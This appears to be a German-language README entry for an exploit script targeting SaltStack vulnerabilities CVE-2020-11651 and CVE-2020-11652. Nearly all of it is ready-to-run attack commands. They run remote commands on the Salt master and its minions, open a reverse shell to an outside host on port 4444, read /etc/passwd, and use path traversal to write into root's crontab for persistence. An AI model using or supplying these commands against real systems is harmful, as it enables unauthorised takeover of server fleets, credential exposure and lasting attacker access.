
Exploit für SaltStack-CVEs (CVE-2020-11651/11652), der Remote-Befehlsausführung auf Master/Minions, Datei-Lesen/-Hochladen und eine Reverse Shell ermöglicht.
CVE-2020-11651 CVE-2020-11652
python exp.py --exec-choose master --exec-cmd "whoami"
python exp.py --exec-choose minions --exec-cmd "whoami"
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444
python exp.py --read /etc/passwd
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"